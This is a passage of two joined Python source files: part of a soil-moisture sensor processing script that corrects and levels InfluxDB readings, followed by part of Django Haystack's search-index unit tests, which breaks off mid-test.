intensity_req = influx_client.query("""SELECT FIRST("intensity") AS "intensity", "bad_data_flag" FROM "intensity" WHERE "time" <= '{}' AND site_no='{}'""".format(p['time'], site_no))
#int_key = "first_intensity"
else:
intensity_req = influx_client.query("""SELECT LAST("intensity") AS "intensity", "bad_data_flag" FROM "intensity" WHERE "time" <= '{}' AND site_no='{}'""".format(p['time'], site_no))
#int_key = "last_intensity"
try:
intensity_p = next(intensity_req.get_points())
except StopIteration:
intensity_req = influx_client.query("""SELECT FIRST("intensity") AS "intensity", "bad_data_flag" FROM "intensity" WHERE "time" >= '{}' AND site_no='{}'""".format(p['time'], site_no))
try:
intensity_p = next(intensity_req.get_points())
#int_key = "first_intensity"
except Exception:
intensity_p = None
#int_key = None
if intensity_p and "intensity" in intensity_p:
use_intensity = float(intensity_p["intensity"])
if use_intensity == 0.0: # prevent div by zero
intensity_corr = 1.0
else:
intensity_corr = use_intensity / float(this_site['ref_intensity'].to_decimal())
else:
intensity_corr = 1.0
latit_scaling = this_site['latit_scaling'].to_decimal()
elev_scaling = this_site['elev_scaling'].to_decimal()
try:
corr_count = (float(count)*wv_corr_use*press_corr/intensity_corr)/float(latit_scaling/elev_scaling)
except ZeroDivisionError:
print("count:", p["count"])
print("latit_scaling:", latit_scaling)
print("elev_scaling:", elev_scaling)
print("wv_corr_use:", wv_corr_use)
print("intensity_corr:", intensity_corr)
raise
json_body = {
"measurement": "level2",
#"measurement": "level2_temp",
"tags": {
"site_no": p['site_no'],
"flag": int(p['level1_flag']),
},
"time": p['time'],
"fields": {
"count": int(count),
"press_corr": press_corr,
"wv_corr": wv_corr_store,
"intensity_corr": intensity_corr,
"corr_count": corr_count,
"rain": float(p['rain']),
}
}
writer.write_point(json_body)
def is_duplicate(site_no, record1, record2, table):
if isinstance(record2, datetime):
record2 = datetime_to_isostring(record2)
if isinstance(record2, str):
result = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag as raw_flag
FROM "{}"
WHERE "time" = '{}' AND site_no=$s;""".format(table, record2), bind_params={"s": str(site_no)})
points = result.get_points()
try:
record2 = next(iter(points))
except (IndexError, StopIteration):
return False
different = {}
for key, val in record1.items():
if key in ("time", "site_no", "flag"):
continue
if key in record2:
val2 = record2[key]
if val != val2:
different[key] = (val, val2)
return len(different) < 1
def raw_to_level1(site_no=1, start_time=None, backprocess=None, drop_old=False):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
a_res = influx_client.query("""SELECT "time", "count", site_no FROM "raw_values" WHERE site_no=$s""", bind_params={"s": str(site_no)})
all_mapped = {}
for p in a_res.get_points():
all_mapped[isostring_to_datetime(p["time"])] = p
all_times = SortedList(all_mapped.keys())
result = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag as raw_flag
FROM "raw_values"
WHERE "time" > '{}' AND site_no=$s;""".format(time_string), bind_params={"s": str(site_no)})
points = result.get_points()
result2 = influx_client.query("""\
SELECT DIFFERENCE("count") as count_diff
FROM "raw_values"
WHERE "time" > '{}' AND site_no=$s""".format(time_string), bind_params={"s": str(site_no)})
points2 = result2.get_points()
if drop_old:
influx_client.query("DROP SERIES FROM level1 WHERE site_no=$s;", bind_params={"s":str(site_no)}, method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
try:
#skip the first p, because it doesn't have a corresponding diff
_ = next(points)
except StopIteration:
return
#influx_client.query("DROP SERIES FROM level1_temp WHERE site_no='{}';".format(site_no), method='POST')
for p in points:
time_str = p['time']
at_time = isostring_to_datetime(time_str)
count = p['count']
dup_back_time = at_time - timedelta(minutes=29.0)
possible_duplicates_times = list(all_times.irange(dup_back_time, at_time, inclusive=(True, False)))
if len(possible_duplicates_times) > 0:
for dt in possible_duplicates_times:
dc = all_mapped[dt]['count']
dtstring = all_mapped[dt]['time']
if dc == count:
im_duplicate = is_duplicate(site_no, p, dtstring, 'raw_values')
if im_duplicate:
break
else:
im_duplicate = False
if im_duplicate:
print("Skipping time {} at site {} because it is a duplicate.".format(time_str, site_no))
_ = next(points2)
continue
bat = p['battery']
p2 = next(points2)
count_diff = p2['count_diff']
prev_count = count+(count_diff * -1.0)
if prev_count < 0:
raise ValueError("Incorrect previous_count calculation.")
if bat < 10:
flag = 4
elif count < (0.8 * prev_count) or count > (1.2 * prev_count):
flag = 1
else:
flag = p['raw_flag']
json_body = {
"measurement": "level1",
#"measurement": "level1_temp",
"tags": {
"site_no": p['site_no'],
"flag": int(flag),
},
"time": time_str,
"fields": {
"count": int(p['count']),
"pressure1": float(p['pressure1']),
"internal_temperature": float(p['internal_temperature']),
"internal_humidity": float(p['internal_humidity']),
"battery": float(p['battery']),
"tube_temperature": float(p['tube_temperature']),
"tube_humidity": float(p['tube_humidity']),
"rain": float(p['rain']),
"vwc1": float(p['vwc1']),
"vwc2": float(p['vwc2']),
"vwc3": float(p['vwc3']),
"pressure2": float(p['pressure2']),
"external_temperature": float(p['external_temperature']),
"external_humidity": float(p['external_humidity']),
}
}
writer.write_point(json_body)
def fix_raws(site_no=1):
result = influx_client.query("""\
SELECT *
FROM "raw_values"
WHERE site_no='{}';""".format(site_no))
points = result.get_points()
bad_times = []
for p in points:
count = p['count']
battery = p['battery']
time = p['time']
if count is None and battery is None:
bad_times.append(time)
if len(bad_times) < 1:
return
for bad_t in bad_times:
del_query = """\
DELETE FROM "raw_values"
WHERE site_no='{}' AND time='{}';""".format(site_no, bad_t)
result = influx_client.query(del_query)
print(result)
return
def test1(site_no=1, start_time=None):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag
FROM "level1"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag
FROM "level1_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
_ = next(points1)
t = 0
d = 0
for p1 in points1:
p2 = next(points2)
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
d += 1
print(k, ':', p1[k], '->', p2[k])
return d < 1
def test2(site_no=1, start_time=None):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
SELECT "time", site_no, "count", press_corr, wv_corr, intensity_corr, corr_count, flag
FROM "level2"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
SELECT "time", site_no, "count", press_corr, wv_corr, intensity_corr, corr_count, flag
FROM "level2_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
t = 0
d = 0
for p1 in points1:
p2 = next(points2)
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
orig_one = p1[k]
if isinstance(orig_one, float):
diff = math.fabs(orig_one - p2[k])
diff_perc = (diff/orig_one) * 100
#these all seem to be 0.00000088888888 different. (8.8888888e-07)
if diff_perc < 8.88888912e-07:
#print("Close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
pass
else:
d += 1
print("Not close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
print(p1)
print(p2)
else:
d += 1
print("Different!", k, ':', p1[k], '->', p2[k])
print(p1)
print(p2)
if d > 0:
percent_wrong = (d/t) * 100
print("Percentage of total entries with differences: {}/{} {}%".format(d, t, percent_wrong))
return d < 1
def test3(site_no=1, start_time=None):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
--SELECT "time", site_no, soil_moist, effective_depth, flag
SELECT "time", site_no, soil_moist, effective_depth, rainfall, flag
FROM "level3"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
--SELECT "time", site_no, soil_moist, effective_depth, flag
SELECT "time", site_no, soil_moist, effective_depth, rainfall, flag
FROM "level3_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
t = 0
d = 0
for p1 in points1:
p2 = next(points2)
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
orig_one = p1[k]
if isinstance(orig_one, float):
diff = math.fabs(orig_one - p2[k])
diff_perc = (diff / orig_one) * 100
if diff < 0.00001 or diff_perc < 0.00033:
pass
else:
d += 1
print("Not close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
print(p1)
print(p2)
else:
d += 1
print("Different!", k, ':', p1[k], '->', p2[k])
print(p1)
print(p2)
if d > 0:
percent_wrong = (d/t) * 100
print("Percentage of total entries with differences: {}/{} {}%".format(d, t, percent_wrong))
return d < 1
def test4(site_no=1, start_time=None):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
SELECT "time", site_no, soil_moist, effective_depth, rainfall, soil_moist_filtered, depth_filtered
FROM "level4"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
SELECT "time", site_no, soil_moist, effective_depth, rainfall, soil_moist_filtered, depth_filtered
FROM "level4_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
t = 0
d = 0
for p1 in points1:
try:
p2 = next(points2)
except StopIteration:
break
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
orig_one = p1[k]
if isinstance(orig_one, float):
diff = math.fabs(orig_one - p2[k])
diff_perc = (diff / orig_one) * 100
# these all seem to be 0.00000088888888 different. (8.8888888e-07)
if diff < 3.29e-05 or diff_perc < 4.8e-06:
# print("Close enough: ", k, ':', p1[k], '->', p2[k], "d:", diff)
pass
else:
d += 1
print("Not close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
print(p1)
print(p2)
else:
d += 1
print("Different!", k, ':', p1[k], '->', p2[k])
print(p1)
print(p2)
if d > 0:
percent_wrong = (d/t) * 100
print("Percentage of total entries with differences: {}/{} {}%".format(d, t, percent_wrong))
return d < 1
def process_levels(site_no, options={}):
start_time = options.get('start_time', None)
backprocess = options.get('backprocess', None)
do_tests = options.get('do_tests', False)
drop_old = options.get('drop_old', False)
mongo_client2 = MongoClient(mongodb_config['DB_HOST'], int(mongodb_config['DB_PORT'])) # 27017
p_start_time = datetime.now().astimezone(timezone.utc)
if start_time is None:
start_time = p_start_time
print("Starting process_levels for site {}, at {}".format(site_no, p_start_time))
if do_tests:
print("Doing site {} with sanity tests turned on. This takes longer.".format(site_no))
#fix_raws(site_no=site_no)
raw_to_level1(site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
print("Finished raw->level1 for site {}, starting level1->level2.".format(site_no))
if do_tests:
assert test1(site_no=site_no, start_time=start_time)
level1_to_level2(mongo_client2, site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
print("Finished level1->level2 for site {}, starting level2->level3.".format(site_no))
if do_tests:
assert test2(site_no=site_no, start_time=start_time)
level2_to_level3(mongo_client2, site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
print("Finished level2->level3 for site {}, starting level3->level4.".format(site_no))
if do_tests:
assert test3(site_no=site_no, start_time=start_time)
level3_to_level4(site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
if do_tests:
assert test4(site_no=site_no, start_time=start_time)
p_end_time = datetime.now().astimezone(timezone.utc)
print("Finished process_levels for site {}, at {}".format(site_no, p_end_time))
print("Site {} process_levels took {}".format(site_no, (p_end_time-p_start_time)))
# if __name__ == "__main__":
# from threading import Thread
# #process_levels(site_no=2, do_tests=True)
# mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
# all_sites = mdb.all_sites
# all_stations_docs = mdb.all_stations
# all_stations = all_stations_docs.find({}, {'site_no': 1})
# start_time = datetime.now().astimezone(timezone.utc)
# threads = []
# print("Using multithreading")
# for s in all_stations:
# site_no = s['site_no']
# #process_levels(site_no, start_time=start_time, do_tests=False, backprocess=ONE_YEAR)
# t = Thread(target=process_levels, args=(site_no,), kwargs={'start_time':start_time, 'do_tests': False, 'backprocess': ONE_YEAR})
# t.start()
# threads.append(t)
# _ = [t.join() for t in threads]
# end_time = datetime.utcnow()
# print("Finished process_levels for All Sites at {}".format(end_time))
# print("All sites process_levels took {}".format((end_time-start_time)))
def main():
start_time = datetime.now().astimezone(timezone.utc)
parser = argparse.ArgumentParser(description='Run the processing levels on the cosmoz influxdb.')
parser.add_argument('-s', '--site-number', type=str, dest="siteno",
help='Pick just one site number')
parser.add_argument('-d', '--process-days', type=str, dest="processdays",
help='Number of days to backprocess. Default is 365 days.')
parser.add_argument('-xx', '--dropold', dest="drop_old", action="store_true",
help='Drop old contents of table before processing its contents. USE WITH CAUTION!')
parser.add_argument('-t', '--from-datetime', type=str, dest="fromdatetime",
help='The earliest datetime to backprocess to. In isoformat. Default is all of history.\nNote cannot use -d and -t together.')
parser.add_argument('-o', '--output', dest='output', nargs='?', type=argparse.FileType('w'),
help='Send output to a file (defaults to stdout).',
default=sys.stdout)
args = parser.parse_args()
outfile = args.output
def printout(*values, sep=' ', end='\n'):
return print(*values, sep=sep, end=end, file=outfile, flush=True)
try:
processdays = args.processdays
fromdatetime = args.fromdatetime
drop_old = args.drop_old
siteno = args.siteno
if processdays is not None and fromdatetime is not None:
raise RuntimeError("Cannot use -d and -t at the same time. Pick one.")
if processdays:
try:
processdays = int(processdays)
except:
raise RuntimeError("-d must be an integer")
backprocess = timedelta(days=processdays)
else:
if fromdatetime is None:
backprocess = ONE_YEAR
else:
fromdatetime = isostring_to_datetime(fromdatetime)
backprocess = start_time - fromdatetime
if backprocess.days < 0:
raise RuntimeError("Cannot backprocess negative time. Ensure it is positive.")
mongo_client = MongoClient(mongodb_config['DB_HOST'], int(mongodb_config['DB_PORT'])) # 27017
mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
all_sites = mdb.all_sites
all_stations_docs = mdb.all_stations
if siteno is not None:
sitenos = [int(s.strip()) for s in siteno.split(',') if s]
all_stations = all_stations_docs.find({'site_no': {"$in": sitenos}}, {'site_no': 1})
else:
all_stations = all_stations_docs.find({}, {'site_no': 1})
mongo_client.close()
worker_options = {'start_time': start_time, 'do_tests': False, 'backprocess': backprocess, 'drop_old': drop_old}
all_stations = list(all_stations) #This turns a the mongo cursor into a python list
if len(all_stations) < 1:
printout("No stations to process.")
return
elif len(all_stations) < 2:
printout("Only doing station {}".format(siteno))
process_levels(all_stations[0]['site_no'], worker_options)
end_time = datetime.now().astimezone(timezone.utc)
printout("Finished process_levels for site {} at {}".format(siteno, end_time))
printout("process_levels took {}".format((end_time - start_time)))
else:
printout("Using multiprocessing")
processes = []
pool = Pool(None) # uses os.cpu_count
with pool as p:
worker_args = [(s['site_no'], worker_options) for s in all_stations]
p.starmap(process_levels, worker_args)
end_time = datetime.now().astimezone(timezone.utc)
printout("Finished process_levels for All Sites at {}".format(end_time))
printout("All sites process_levels took {}".format((end_time - start_time)))
finally:
outfile.close()
if __name__ == "__main__":
main()
|
test_indexes.py
|
# encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import time
from threading import Thread
from django.test import TestCase
from six.moves import queue
from test_haystack.core.models import (
AFifthMockModel,
AnotherMockModel,
AThirdMockModel,
ManyToManyLeftSideModel,
ManyToManyRightSideModel,
MockModel,
)
from haystack import connections, indexes
from haystack.exceptions import SearchFieldError
from haystack.utils.loading import UnifiedIndex
class BadSearchIndex1(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class BadSearchIndex2(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
content2 = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class GoodMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
extra = indexes.CharField(indexed=False, use_template=True)
def get_model(self):
return MockModel
# For testing inheritance...
class AltGoodMockSearchIndex(GoodMockSearchIndex, indexes.Indexable):
additional = indexes.CharField(model_attr="author")
def get_model(self):
return MockModel
class GoodCustomMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", faceted=True)
pub_date = indexes.DateTimeField(model_attr="pub_date", faceted=True)
extra = indexes.CharField(indexed=False, use_template=True)
hello = indexes.CharField(model_attr="hello")
def prepare(self, obj):
super(GoodCustomMockSearchIndex, self).prepare(obj)
self.prepared_data["whee"] = "Custom preparation."
return self.prepared_data
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def load_all_queryset(self):
return self.get_model()._default_manager.filter(id__gt=1)
def get_model(self):
return MockModel
def index_queryset(self, using=None):
return MockModel.objects.all()
def read_queryset(self, using=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
def build_queryset(self, start_date=None, end_date=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
class GoodNullableMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", null=True, faceted=True)
def get_model(self):
return MockModel
class GoodOverriddenFieldNameMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(
document=True, use_template=True, index_fieldname="more_content"
)
author = indexes.CharField(model_attr="author", index_fieldname="name_s")
hello = indexes.CharField(model_attr="hello")
def get_model(self):
return MockModel
class GoodFacetedMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
author_foo = indexes.FacetCharField(facet_for="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
pub_date_exact = indexes.FacetDateTimeField(facet_for="pub_date")
def get_model(self):
return MockModel
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def prepare_pub_date_exact(self, obj):
return "2010-10-26T01:54:32"
class MROFieldsSearchIndexA(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_a")
def get_model(self):
return MockModel
class MROFieldsSearchIndexB(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_b")
def get_model(self):
return MockModel
class MROFieldsSearchChild(MROFieldsSearchIndexA, MROFieldsSearchIndexB):
pass
class ModelWithManyToManyFieldAndAttributeLookupSearchIndex(
indexes.SearchIndex, indexes.Indexable
):
text = indexes.CharField(document=True)
related_models = indexes.MultiValueField(model_attr="related_models__name")
def get_model(self):
return ManyToManyLeftSideModel
class SearchIndexTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super(SearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.mi = GoodMockSearchIndex()
self.cmi = GoodCustomMockSearchIndex()
self.cnmi = GoodNullableMockSearchIndex()
self.gfmsi = GoodFacetedMockSearchIndex()
# Fake the unified index.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.ui.build(indexes=[self.mi])
connections["default"]._index = self.ui
self.sample_docs = {
"core.mockmodel.1": {
"text": "Indexed!\n1",
"django_id": "1",
"django_ct": "core.mockmodel",
"extra": "Stored!\n1",
"author": "daniel1",
"pub_date": datetime.datetime(2009, 3, 17, 6, 0),
"id": "core.mockmodel.1",
},
"core.mockmodel.2": {
"text": "Indexed!\n2",
"django_id": "2",
"django_ct": "core.mockmodel",
"extra": "Stored!\n2",
"author": "daniel2",
"pub_date": datetime.datetime(2009, 3, 17, 7, 0),
"id": "core.mockmodel.2",
},
"core.mockmodel.3": {
"text": "Indexed!\n3",
"django_id": "3",
"django_ct": "core.mockmodel",
"extra": "Stored!\n3",
"author": "daniel3",
"pub_date": datetime.datetime(2009, 3, 17, 8, 0),
"id": "core.mockmodel.3",
},
}
def tearDown(self):
connections["default"]._index = self.old_unified_index
super(SearchIndexTestCase, self).tearDown()
def test_no_contentfield_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex1)
def test_too_many_contentfields_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex2)
def test_contentfield_present(self):
try:
mi = GoodMockSearchIndex()
except:
self.fail()
def test_proper_fields(self):
self.assertEqual(len(self.mi.fields), 4)
self.assertTrue("text" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["extra"], indexes.CharField))
self.assertEqual(len(self.cmi.fields), 7)
self.assertTrue("text" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["author"], indexes.CharField))
self.assertTrue("author_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["author_exact"], indexes.FacetCharField)
)
self.assertTrue("pub_date" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("pub_date_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["pub_date_exact"], indexes.FacetDateTimeField)
)
self.assertTrue("extra" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
self.assertTrue("hello" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
def test_index_queryset(self):
self.assertEqual(len(self.cmi.index_queryset()), 3)
def test_read_queryset(self):
self.assertEqual(len(self.cmi.read_queryset()), 2)
def test_build_queryset(self):
# The custom SearchIndex.build_queryset returns the same records as
# the read_queryset
self.assertEqual(len(self.cmi.build_queryset()), 2)
# Store a reference to the original method
old_guf = self.mi.__class__.get_updated_field
self.mi.__class__.get_updated_field = lambda self: "pub_date"
# With an updated field, we should get have filtered results
sd = datetime.datetime(2009, 3, 17, 7, 0)
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 2)
ed = datetime.datetime(2009, 3, 17, 7, 59)
self.assertEqual(len(self.mi.build_queryset(end_date=ed)), 2)
sd = datetime.datetime(2009, 3, 17, 6, 0)
ed = datetime.datetime(2009, 3, 17, 6, 59)
self.assertEqual(len(self.mi.build_queryset(start_date=sd, end_date=ed)), 1)
# Remove the updated field for the next test
del self.mi.__class__.get_updated_field
# The default should return all 3 even if we specify a start date
# because there is no updated field specified
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 3)
# Restore the original attribute
self.mi.__class__.get_updated_field = old_guf
def test_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.mi.prepare(mock)), 7)
self.assertEqual(
sorted(self.mi.prepare(mock).keys()),
["author", "django_ct", "django_id", "extra", "id", "pub_date", "text"],
)
def test_custom_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
def test_thread_safety(self):
# This is a regression. ``SearchIndex`` used to write to
# ``self.prepared_data``, which would leak between threads if things
# went too fast.
exceptions = []
def threaded_prepare(index_queue, index, model):
try:
index.queue = index_queue
prepped = index.prepare(model)
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchIndex(GoodMockSearchIndex):
def prepare_author(self, obj):
if obj.pk == 20:
time.sleep(0.1)
else:
time.sleep(0.5)
index_queue.put(self.prepared_data["author"])
return self.prepared_data["author"]
tmi = ThreadedSearchIndex()
index_queue = queue.Queue()
mock_1 = MockModel()
mock_1.pk = 20
mock_1.author = "foo"
mock_1.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock_2 = MockModel()
mock_2.pk = 21
mock_2.author = "daniel%s" % mock_2.id
mock_2.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
th1 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_1))
th2 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_2))
th1.start()
th2.start()
th1.join()
th2.join()
mock_1_result = index_queue.get()
mock_2_result = index_queue.get()
self.assertEqual(mock_1_result, "foo")
self.assertEqual(mock_2_result, "daniel21")
def test_custom_prepare_author(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["author"], "Hi, I'm daniel20")
self.assertEqual(self.cmi.prepared_data["author_exact"], "Hi, I'm daniel20")
def test_custom_model_attr(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["hello"], "World!")
def test_custom_index_fieldname(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
cofnmi = GoodOverriddenFieldNameMockSearchIndex()
self.assertEqual(len(cofnmi.prepare(mock)), 6)
self.assertEqual(
sorted(cofnmi.prepare(mock).keys()),
["django_ct", "django_id", "hello", "id", "more_content", "name_s"],
)
self.assertEqual(cofnmi.prepared_data["name_s"], "daniel20")
self.assertEqual(cofnmi.get_content_field(), "more_content")
def test_get_content_field(self):
self.assertEqual(self.mi.get_content_field(), "text")
def test_update(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
self.sb.clear()
def test_update_object(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "20")],
)
self.sb.clear()
def test_remove_object(self):
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
# Put it back so we can test passing kwargs.
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock, commit=False)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
